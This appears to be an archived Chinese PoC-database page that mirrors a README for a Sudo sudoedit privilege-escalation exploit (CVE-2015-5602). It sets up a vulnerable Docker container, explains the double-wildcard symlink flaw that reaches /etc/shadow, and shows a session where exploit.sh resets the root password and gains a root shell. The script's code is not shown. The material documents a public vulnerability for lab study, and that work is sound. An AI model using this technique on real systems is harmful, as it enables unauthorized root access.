关联漏洞
标题:
Sudo sudoedit 安全漏洞
(CVE-2015-5602)
描述:Sudo是软件开发者Todd C. Miller所研发的一套用于类Unix操作系统下并允许用户通过安全的方式使用特殊的权限执行命令的程序。 Sudo 1.8.15之前版本的sudoedit中存在安全漏洞,该漏洞源于当重复使用通配符时程序没有检查完整路径。本地攻击者可通过实施符号链接攻击利用该漏洞获取权限。
描述
Sudo <= 1.8.14 Local Privilege Escalation and vulnerable container
介绍
# Sudo <=1.8.14 Local Privilege Escalation
Sudo (su "do") allows a system administrator to give certain users (or groups of users) the ability to run some (or all) commands as root while logging all commands and arguments.
## Vulnerable environment
To setup a vulnerable environment for your test you will need [Docker](https://docker.com) installed, and just run the following command:
docker build -t privesc/cve-2015-5602 .
docker run --rm -it privesc/cve-2015-5602
And it will spawn a interactive shell with low user privileges.
## Vulnerable code
The bug was found in sudoedit, which does not check the full path if a wildcard is used twice (e.g. `/home/*/*/esc.txt`), this allows a malicious user to replace the esc.txt real file with a symbolic link to a different location (e.g. `/etc/shadow`).
Successfully exploiting this issue may allow an attacker to manipulate files and to gain root privileges on host system through symlink attacks.
## Exploit
To exploit this target just run:
./exploit.sh
If you are using this vulnerable image, you can just run:
user@1cc9cd901b07:~$ sudo -l
User user may run the following commands on 1cc9cd901b07:
(root) NOPASSWD: sudoedit /home/*/*/esc.txt
user@1cc9cd901b07:~$ ./exploit.sh
[+] CVE-2015-5602 exploit by t0kx
[+] Creating folder...
[+] Creating symlink
[+] Modify EDITOR...
[+] Change root password to: d03c09dc34c53657aff1f459a86b20ed
[+] Done
user@1cc9cd901b07:~$ su
Password:
root@1cc9cd901b07:/home/user# id
uid=0(root) gid=0(root) groups=0(root)
root@1cc9cd901b07:/home/user#
## Credits
This flaw was found by Daniel Svartman.
## Disclaimer
This or previous program is for Educational purpose **ONLY**. Do not use it without permission. The usual disclaimer applies, especially the fact that me (t0kx) is not liable for any damages caused by direct or indirect use of the information or functionality provided by these programs. The author or any Internet provider bears **NO** responsibility for content or misuse of these programs or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, system crash, system compromise, etc.) caused by the use of these programs is not t0kx's responsibility.
文件快照
[4.0K] /data/pocs/0499248086294b0758b816f8ca16c9d678712258
├── [ 843] Dockerfile
├── [ 803] exploit.sh
├── [1.5K] LICENSE
└── [2.2K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。